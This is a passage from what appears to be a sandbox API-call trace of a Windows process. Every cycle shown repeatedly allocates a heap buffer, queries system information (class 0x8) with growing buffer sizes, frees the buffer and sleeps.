SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.767] Sleep (dwMilliseconds=0x110) [0207.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.781] Sleep (dwMilliseconds=0x110) [0207.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.802] Sleep (dwMilliseconds=0x110) [0207.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.816] Sleep (dwMilliseconds=0x110) [0207.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.832] Sleep (dwMilliseconds=0x110) [0207.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.846] Sleep (dwMilliseconds=0x110) [0207.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.863] Sleep (dwMilliseconds=0x110) [0207.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.879] Sleep (dwMilliseconds=0x110) [0207.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.891] Sleep (dwMilliseconds=0x110) [0207.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.913] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.914] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.914] Sleep (dwMilliseconds=0x110) [0207.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.926] Sleep (dwMilliseconds=0x110) [0207.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.934] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.938] Sleep (dwMilliseconds=0x110) [0207.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.958] Sleep (dwMilliseconds=0x110) [0207.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 